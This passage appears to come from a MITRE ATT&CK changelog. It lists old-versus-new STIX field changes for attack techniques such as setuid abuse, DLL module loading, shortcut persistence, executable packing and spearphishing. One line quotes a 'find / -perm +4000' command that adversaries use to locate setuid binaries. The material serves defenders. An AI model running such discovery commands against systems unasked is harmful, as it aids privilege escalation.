Alternatively, adversaries may choose to find and target vulnerable binaries with the setuid or setgid bits already enabled (i.e. [File and Directory Discovery](https://attack.mitre.org/techniques/T1083)). The setuid and setguid bits are indicated with an "s" instead of an "x" when viewing a file's attributes via ls -l. The find command can also be used to search for such files. For example, find / -perm +4000 2>/dev/null can be used to find files with setuid set and find / -perm +2000 2>/dev/null may be used for setgid. Binaries that have these bits set may then be abused by adversaries.(Citation: GTFOBins Suid) |
| external_references[1]['source_name'] | setuid man page | GTFOBins Suid |
| external_references[1]['description'] | Michael Kerrisk. (2017, September 15). Linux Programmer's Manual. Retrieved September 21, 2018. | Emilio Pinna, Andrea Cardaci. (n.d.). GTFOBins. Retrieved January 28, 2022. |
| external_references[1]['url'] | http://man7.org/linux/man-pages/man2/setuid.2.html | https://gtfobins.github.io/#+suid |
| x_mitre_data_sources[0] | Command: Command Execution | File: File Modification |
| x_mitre_data_sources[2] | File: File Modification | Command: Command Execution |
| x_mitre_version | 1.0 | 1.1 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'setuid man page', 'description': "Michael Kerrisk. (2017, September 15). Linux Programmer's Manual. Retrieved September 21, 2018.", 'url': 'http://man7.org/linux/man-pages/man2/setuid.2.html'} |
| Old Description | New Description |
|---|---|
Adversaries may execute malicious payloads via loading shared modules. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows [Native API](https://attack.mitre.org/techniques/T1106) which is called from functions like CreateProcess, LoadLibrary, etc. of the Win32 API. (Citation: Wikipedia Windows Library Files) The module loader can load DLLs: * via specification of the (fully-qualified or relative) DLL pathname in the IMPORT directory; * via EXPORT forwarded to another DLL, specified with (fully-qualified or relative) pathname (but without extension); * via an NTFS junction or symlink program.exe.local with the fully-qualified or relative pathname of a directory containing the DLLs specified in the IMPORT directory or forwarded EXPORTs; * via <file name="filename.extension" loadFrom="fully-qualified or relative pathname"> in an embedded or external "application manifest". The file name refers to an entry in the IMPORT directory or a forwarded EXPORT. Adversaries may use this functionality as a way to execute arbitrary payloads on a victim system. For example, malware may execute share modules to load additional components or features. |
Adversaries may execute malicious payloads via loading shared modules. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows [Native API](https://attack.mitre.org/techniques/T1106) which is called from functions like CreateProcess, LoadLibrary, etc. of the Win32 API.(Citation: Wikipedia Windows Library Files)
The module loader can load DLLs:
* via specification of the (fully-qualified or relative) DLL pathname in the IMPORT directory;
* via EXPORT forwarded to another DLL, specified with (fully-qualified or relative) pathname (but without extension);
* via an NTFS junction or symlink program.exe.local with the fully-qualified or relative pathname of a directory containing the DLLs specified in the IMPORT directory or forwarded EXPORTs;
* via <file name="filename.extension" loadFrom="fully-qualified or relative pathname"> in an embedded or external "application manifest". The file name refers to an entry in the IMPORT directory or a forwarded EXPORT.
Adversaries may use this functionality as a way to execute arbitrary payloads on a victim system. For example, malware may execute share modules to load additional components or features. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| x_mitre_remote_support | False |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-15 13:48:02.963000+00:00 | 2022-04-19 20:31:10.657000+00:00 |
| description | Adversaries may execute malicious payloads via loading shared modules. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows [Native API](https://attack.mitre.org/techniques/T1106) which is called from functions like CreateProcess, LoadLibrary, etc. of the Win32 API. (Citation: Wikipedia Windows Library Files)
The module loader can load DLLs:
* via specification of the (fully-qualified or relative) DLL pathname in the IMPORT directory;
* via EXPORT forwarded to another DLL, specified with (fully-qualified or relative) pathname (but without extension);
* via an NTFS junction or symlink program.exe.local with the fully-qualified or relative pathname of a directory containing the DLLs specified in the IMPORT directory or forwarded EXPORTs;
* via <file name="filename.extension" loadFrom="fully-qualified or relative pathname"> in an embedded or external "application manifest". The file name refers to an entry in the IMPORT directory or a forwarded EXPORT.
Adversaries may use this functionality as a way to execute arbitrary payloads on a victim system. For example, malware may execute share modules to load additional components or features. |
Adversaries may execute malicious payloads via loading shared modules. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows [Native API](https://attack.mitre.org/techniques/T1106) which is called from functions like CreateProcess, LoadLibrary, etc. of the Win32 API.(Citation: Wikipedia Windows Library Files)
The module loader can load DLLs:
* via specification of the (fully-qualified or relative) DLL pathname in the IMPORT directory;
* via EXPORT forwarded to another DLL, specified with (fully-qualified or relative) pathname (but without extension);
* via an NTFS junction or symlink program.exe.local with the fully-qualified or relative pathname of a directory containing the DLLs specified in the IMPORT directory or forwarded EXPORTs;
* via <file name="filename.extension" loadFrom="fully-qualified or relative pathname"> in an embedded or external "application manifest". The file name refers to an entry in the IMPORT directory or a forwarded EXPORT.
Adversaries may use this functionality as a way to execute arbitrary payloads on a victim system. For example, malware may execute share modules to load additional components or features. |
| x_mitre_data_sources[0] | Process: OS API Execution | Module: Module Load |
| x_mitre_data_sources[1] | Module: Module Load | Process: OS API Execution |
| Old Description | New Description |
|---|---|
| Adversaries may create or edit shortcuts to run a program during system boot or user login. Shortcuts or symbolic links are ways of referencing other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process. Adversaries could use shortcuts to execute their tools for persistence. They may create a new shortcut as a means of indirection that may use [Masquerading](https://attack.mitre.org/techniques/T1036) to look like a legitimate program. Adversaries could also edit the target path or entirely replace an existing shortcut so their tools will be executed instead of the intended legitimate program. | Adversaries may create or modify shortcuts that can execute a program during system boot or user login. Shortcuts or symbolic links are used to reference other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process. Adversaries may abuse shortcuts in the startup folder to execute their tools and achieve persistence.(Citation: Shortcut for Persistence ) Although often used as payloads in an infection chain (e.g. [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001)), adversaries may also create a new shortcut as a means of indirection, while also abusing [Masquerading](https://attack.mitre.org/techniques/T1036) to make the malicious shortcut appear as a legitimate program. Adversaries can also edit the target path or entirely replace an existing shortcut so their malware will be executed instead of the intended legitimate program. Shortcuts can also be abused to establish persistence by implementing other methods. For example, LNK browser extensions may be modified (e.g. [Browser Extensions](https://attack.mitre.org/techniques/T1176)) to persistently launch malware. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| external_references | Elastic. (n.d.). Shortcut File Written or Modified for Persistence. Retrieved June 1, 2022. |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | CAPEC-132 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-04-13 21:30:24.555000+00:00 | 2022-10-19 22:29:46.175000+00:00 |
| description | Adversaries may create or edit shortcuts to run a program during system boot or user login. Shortcuts or symbolic links are ways of referencing other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process. Adversaries could use shortcuts to execute their tools for persistence. They may create a new shortcut as a means of indirection that may use [Masquerading](https://attack.mitre.org/techniques/T1036) to look like a legitimate program. Adversaries could also edit the target path or entirely replace an existing shortcut so their tools will be executed instead of the intended legitimate program. | Adversaries may create or modify shortcuts that can execute a program during system boot or user login. Shortcuts or symbolic links are used to reference other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process. Adversaries may abuse shortcuts in the startup folder to execute their tools and achieve persistence.(Citation: Shortcut for Persistence ) Although often used as payloads in an infection chain (e.g. [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001)), adversaries may also create a new shortcut as a means of indirection, while also abusing [Masquerading](https://attack.mitre.org/techniques/T1036) to make the malicious shortcut appear as a legitimate program. Adversaries can also edit the target path or entirely replace an existing shortcut so their malware will be executed instead of the intended legitimate program. Shortcuts can also be abused to establish persistence by implementing other methods. For example, LNK browser extensions may be modified (e.g. [Browser Extensions](https://attack.mitre.org/techniques/T1176)) to persistently launch malware. |
| external_references[1]['source_name'] | capec | Shortcut for Persistence |
| external_references[1]['url'] | https://capec.mitre.org/data/definitions/132.html | https://www.elastic.co/guide/en/security/7.17/shortcut-file-written-or-modified-for-persistence.html#shortcut-file-written-or-modified-for-persistence |
| x_mitre_version | 1.1 | 1.2 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/132.html', 'external_id': 'CAPEC-132'} | |
| x_mitre_data_sources | Process: Process Creation |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Process: Process Creation |
| Description |
|---|
| Adversaries may attempt to get a listing of software and software versions that are installed on a system or in a cloud environment. Adversaries may use the information from [Software Discovery](https://attack.mitre.org/techniques/T1518) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable to [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068). |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-03-29 16:05:00.456000+00:00 | 2022-01-29 00:02:24.150000+00:00 |
| x_mitre_data_sources[0] | Firewall: Firewall Metadata | Process: OS API Execution |
| x_mitre_data_sources[2] | Process: Process Creation | Command: Command Execution |
| x_mitre_data_sources[3] | Command: Command Execution | Firewall: Firewall Metadata |
| x_mitre_data_sources[4] | Process: OS API Execution | Process: Process Creation |
| Old Description | New Description |
|---|---|
| Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.(Citation: ESET FinFisher Jan 2018) Utilities used to perform software packing are called packers. Example packers are MPRESS and UPX. A more comprehensive list of known packers is available, (Citation: Wikipedia Exe Compression) but adversaries may create their own packing techniques that do not leave the same artifacts as well-known packers to evade defenses. | Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.(Citation: ESET FinFisher Jan 2018) Utilities used to perform software packing are called packers. Example packers are MPRESS and UPX. A more comprehensive list of known packers is available, but adversaries may create their own packing techniques that do not leave the same artifacts as well-known packers to evade defenses.(Citation: Awesome Executable Packing) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| external_references | Alexandre D'Hondt. (n.d.). Awesome Executable Packing. Retrieved March 11, 2022. | |
| external_references | CAPEC-570 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | CAPEC-570 | |
| external_references | Executable compression. (n.d.). Retrieved December 4, 2014. |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-15 13:56:47.154000+00:00 | 2022-04-19 02:09:27.046000+00:00 |
| description | Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.(Citation: ESET FinFisher Jan 2018) Utilities used to perform software packing are called packers. Example packers are MPRESS and UPX. A more comprehensive list of known packers is available, (Citation: Wikipedia Exe Compression) but adversaries may create their own packing techniques that do not leave the same artifacts as well-known packers to evade defenses. | Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.(Citation: ESET FinFisher Jan 2018) Utilities used to perform software packing are called packers. Example packers are MPRESS and UPX. A more comprehensive list of known packers is available, but adversaries may create their own packing techniques that do not leave the same artifacts as well-known packers to evade defenses.(Citation: Awesome Executable Packing) |
| external_references[1]['source_name'] | capec | Awesome Executable Packing |
| external_references[1]['url'] | https://capec.mitre.org/data/definitions/570.html | https://github.com/dhondta/awesome-executable-packing |
| external_references[3]['source_name'] | Wikipedia Exe Compression | capec |
| external_references[3]['url'] | http://en.wikipedia.org/wiki/Executable_compression | https://capec.mitre.org/data/definitions/570.html |
| x_mitre_version | 1.1 | 1.2 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_platforms | Linux |
| Old Description | New Description |
|---|---|
| Adversaries may send spearphishing emails with a malicious link in an attempt to gain access to victim systems. Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments. Spearphishing may also involve social engineering techniques, such as posing as a trusted source. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this case, the malicious emails contain links. Generally, the links will be accompanied by social engineering text and require the user to actively click or copy and paste a URL into a browser, leveraging [User Execution](https://attack.mitre.org/techniques/T1204). The visited website may compromise the web browser using an exploit, or the user will be prompted to download applications, documents, zip files, or even executables depending on the pretext for the email in the first place. Adversaries may also include links that are intended to interact directly with an email reader, including embedded images intended to exploit the end system directly or verify the receipt of an email (i.e. web bugs/web beacons). Links may also direct users to malicious applications designed to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s, like OAuth tokens, in order to gain access to protected applications and information.(Citation: Trend Micro Pawn Storm OAuth 2017) | Adversaries may send spearphishing emails with a malicious link in an attempt to gain access to victim systems. Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments. Spearphishing may also involve social engineering techniques, such as posing as a trusted source. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this case, the malicious emails contain links. Generally, the links will be accompanied by social engineering text and require the user to actively click or copy and paste a URL into a browser, leveraging [User Execution](https://attack.mitre.org/techniques/T1204). The visited website may compromise the web browser using an exploit, or the user will be prompted to download applications, documents, zip files, or even executables depending on the pretext for the email in the first place. Adversaries may also include links that are intended to interact directly with an email reader, including embedded images intended to exploit the end system directly or verify the receipt of an email (i.e. web bugs/web beacons). Additionally, adversaries may use seemingly benign links that abuse special characters to mimic legitimate websites (known as an "IDN homograph attack").(Citation: CISA IDN ST05-016) Adversaries may also utilize links to perform consent phishing, typically with OAuth 2.0 request URLs that when accepted by the user provide permissions/access for malicious applications, allowing adversaries to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s.(Citation: Trend Micro Pawn Storm OAuth 2017) These stolen access tokens allow the adversary to perform various actions on behalf of the user via API calls. (Citation: Microsoft OAuth 2.0 Consent Phishing 2021) |
New Mitigations:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| external_references | Australian Cyber Security Centre. (2012, December). Mitigating Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020. |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | CAPEC-163 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-04-14 14:38:42.715000+00:00 | 2022-10-21 16:01:45.500000+00:00 |
| description | Adversaries may send spearphishing emails with a malicious link in an attempt to gain access to victim systems. Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments. Spearphishing may also involve social engineering techniques, such as posing as a trusted source. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this case, the malicious emails contain links. Generally, the links will be accompanied by social engineering text and require the user to actively click or copy and paste a URL into a browser, leveraging [User Execution](https://attack.mitre.org/techniques/T1204). The visited website may compromise the web browser using an exploit, or the user will be prompted to download applications, documents, zip files, or even executables depending on the pretext for the email in the first place. Adversaries may also include links that are intended to interact directly with an email reader, including embedded images intended to exploit the end system directly or verify the receipt of an email (i.e. web bugs/web beacons). Links may also direct users to malicious applications designed to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s, like OAuth tokens, in order to gain access to protected applications and information.(Citation: Trend Micro Pawn Storm OAuth 2017) | Adversaries may send spearphishing emails with a malicious link in an attempt to gain access to victim systems. Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments. Spearphishing may also involve social engineering techniques, such as posing as a trusted source. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this case, the malicious emails contain links. Generally, the links will be accompanied by social engineering text and require the user to actively click or copy and paste a URL into a browser, leveraging [User Execution](https://attack.mitre.org/techniques/T1204). The visited website may compromise the web browser using an exploit, or the user will be prompted to download applications, documents, zip files, or even executables depending on the pretext for the email in the first place. Adversaries may also include links that are intended to interact directly with an email reader, including embedded images intended to exploit the end system directly or verify the receipt of an email (i.e. web bugs/web beacons). Additionally, adversaries may use seemingly benign links that abuse special characters to mimic legitimate websites (known as an "IDN homograph attack").(Citation: CISA IDN ST05-016) Adversaries may also utilize links to perform consent phishing, typically with OAuth 2.0 request URLs that when accepted by the user provide permissions/access for malicious applications, allowing adversaries to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s.(Citation: Trend Micro Pawn Storm OAuth 2017) These stolen access tokens allow the adversary to perform various actions on behalf of the user via API calls. (Citation: Microsoft OAuth 2.0 Consent Phishing 2021) |
| external_references[1]['source_name'] | capec | ACSC Email Spoofing |
| external_references[1]['url'] | https://capec.mitre.org/data/definitions/163.html | https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf |
| external_references[2]['source_name'] | Trend Micro Pawn Storm OAuth 2017 | CISA IDN ST05-016 |
| external_references[2]['description'] | Hacquebord, F.. (2017, April 25). Pawn Storm Abuses Open Authentication in Advanced Social Engineering Attacks. Retrieved October 4, 2019. | CISA. (2019, September 27). Security Tip (ST05-016): Understanding Internationalized Domain Names. Retrieved October 20, 2020. |
| external_references[2]['url'] | https://blog.trendmicro.com/trendlabs-security-intelligence/pawn-storm-abuses-open-authentication-advanced-social-engineering-attacks | https://us-cert.cisa.gov/ncas/tips/ST05-016 |
| external_references[3]['source_name'] | Microsoft Anti Spoofing | Trend Micro Pawn Storm OAuth 2017 |
| external_references[3]['description'] | Microsoft. (2020, October 13). Anti-spoofing protection in EOP. Retrieved October 19, 2020. | Hacquebord, F.. (2017, April 25). Pawn Storm Abuses Open Authentication in Advanced Social Engineering Attacks. Retrieved October 4, 2019. |
| external_references[3]['url'] | https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide | https://blog.trendmicro.com/trendlabs-security-intelligence/pawn-storm-abuses-open-authentication-advanced-social-engineering-attacks |
| external_references[4]['source_name'] | ACSC Email Spoofing | Microsoft OAuth 2.0 Consent Phishing 2021 |
| external_references[4]['description'] | Australian Cyber Security Centre. (2012, December). Mitigating Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020. | Microsoft 365 Defender Threat Intelligence Team. (2021, June 14). Microsoft delivers comprehensive solution to battle rise in consent phishing emails. Retrieved December 13, 2021. |
| external_references[4]['url'] | https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf | https://www.microsoft.com/security/blog/2021/07/14/microsoft-delivers-comprehensive-solution-to-battle-rise-in-consent-phishing-emails/ |
| x_mitre_data_sources[1] | Network Traffic: Network Traffic Content | Network Traffic: Network Traffic Flow |
| x_mitre_data_sources[2] | Network Traffic: Network Traffic Flow | Network Traffic: Network Traffic Content |
| x_mitre_detection | URL inspection within email (including expanding shortened links) can help detect links leading to known malicious sites. Detonation chambers can be used to detect these links and either automatically go to these sites to determine if they're potentially malicious, or wait and capture the content if a user visits the link. Filtering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing) Because this technique usually involves user interaction on the endpoint, many of the possible detections take place once [User Execution](https://attack.mitre.org/techniques/T1204) occurs. | URL inspection within email (including expanding shortened links) can help detect links leading to known malicious sites as well as links redirecting to adversary infrastructure based by upon suspicious OAuth patterns with unusual TLDs.(Citation: Microsoft OAuth 2.0 Consent Phishing 2021). Detonation chambers can be used to detect these links and either automatically go to these sites to determine if they're potentially malicious, or wait and capture the content if a user visits the link. Filtering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing) Because this technique usually involves user interaction on the endpoint, many of the possible detections take place once [User Execution](https://attack.mitre.org/techniques/T1204) occurs. |
| x_mitre_version | 2.1 | 2.3 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Microsoft Anti Spoofing', 'description': 'Microsoft. (2020, October 13). Anti-spoofing protection in EOP. Retrieved October 19, 2020.', 'url': 'https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide'} | |
| external_references | {'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/163.html', 'external_id': 'CAPEC-163'} | |
| x_mitre_contributors | Kobi Haimovich, CardinalOps | |
| x_mitre_contributors | Menachem Goldstein |
| Old Description | New Description |
|---|---|
| Adversaries may send spearphishing messages with a malicious link to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, the malicious emails contain links generally accompanied by social engineering text to coax the user to actively click or copy and paste a URL into a browser.(Citation: TrendMictro Phishing)(Citation: PCMag FakeLogin) The given website may closely resemble a legitimate site in appearance and have a URL containing elements from the real site. From the fake website, information is gathered in web forms and sent to the attacker. Adversaries may also use information from previous reconnaissance efforts (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)) to craft persuasive and believable lures. | Adversaries may send spearphishing messages with a malicious link to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, the malicious emails contain links generally accompanied by social engineering text to coax the user to actively click or copy and paste a URL into a browser.(Citation: TrendMictro Phishing)(Citation: PCMag FakeLogin) The given website may be a clone of a legitimate site (such as an online or corporate login portal) or may closely resemble a legitimate site in appearance and have a URL containing elements from the real site. From the fake website, information is gathered in web forms and sent to the adversary. Adversaries may also use information from previous reconnaissance efforts (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)) to craft persuasive and believable lures. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-04-15 03:42:26.537000+00:00 | 2022-10-21 16:01:47.611000+00:00 |
| description | Adversaries may send spearphishing messages with a malicious link to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, the malicious emails contain links generally accompanied by social engineering text to coax the user to actively click or copy and paste a URL into a browser.(Citation: TrendMictro Phishing)(Citation: PCMag FakeLogin) The given website may closely resemble a legitimate site in appearance and have a URL containing elements from the real site. From the fake website, information is gathered in web forms and sent to the attacker. Adversaries may also use information from previous reconnaissance efforts (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)) to craft persuasive and believable lures. | Adversaries may send spearphishing messages with a malicious link to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, the malicious emails contain links generally accompanied by social engineering text to coax the user to actively click or copy and paste a URL into a browser.(Citation: TrendMictro Phishing)(Citation: PCMag FakeLogin) The given website may be a clone of a legitimate site (such as an online or corporate login portal) or may closely resemble a legitimate site in appearance and have a URL containing elements from the real site. From the fake website, information is gathered in web forms and sent to the adversary. Adversaries may also use information from previous reconnaissance efforts (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)) to craft persuasive and believable lures. |
| external_references[1]['source_name'] | TrendMictro Phishing | ACSC Email Spoofing |
| external_references[1]['description'] | Babon, P. (2020, September 3). Tricky 'Forms' of Phishing. Retrieved October 20, 2020. | Australian Cyber Security Centre. (2012, December). Mitigating Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020. |
| external_references[1]['url'] | https://www.trendmicro.com/en_us/research/20/i/tricky-forms-of-phishing.html | https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf |
| external_references[2]['source_name'] | PCMag FakeLogin | TrendMictro Phishing |
| external_references[2]['description'] | Kan, M. (2019, October 24). Hackers Try to Phish United Nations Staffers With Fake Login Pages. Retrieved October 20, 2020. | Babon, P. (2020, September 3). Tricky 'Forms' of Phishing. Retrieved October 20, 2020. |
| external_references[2]['url'] | https://www.pcmag.com/news/hackers-try-to-phish-united-nations-staffers-with-fake-login-pages | https://www.trendmicro.com/en_us/research/20/i/tricky-forms-of-phishing.html |
| external_references[3]['source_name'] | Microsoft Anti Spoofing | PCMag FakeLogin |
| external_references[3]['description'] | Microsoft. (2020, October 13). Anti-spoofing protection in EOP. Retrieved October 19, 2020. | Kan, M. (2019, October 24). Hackers Try to Phish United Nations Staffers With Fake Login Pages. Retrieved October 20, 2020. |
| external_references[3]['url'] | https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide | https://www.pcmag.com/news/hackers-try-to-phish-united-nations-staffers-with-fake-login-pages |
| external_references[4]['source_name'] | ACSC Email Spoofing | Microsoft Anti Spoofing |
| external_references[4]['description'] | Australian Cyber Security Centre. (2012, December). Mitigating Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020. | Microsoft. (2020, October 13). Anti-spoofing protection in EOP. Retrieved October 19, 2020. |
| external_references[4]['url'] | https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf | https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide |
| x_mitre_data_sources[0] | Application Log: Application Log Content | Network Traffic: Network Traffic Content |
| x_mitre_data_sources[1] | Network Traffic: Network Traffic Content | Application Log: Application Log Content |
| x_mitre_version | 1.1 | 1.3 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_contributors | Menachem Goldstein |
| Old Description | New Description |
|---|---|
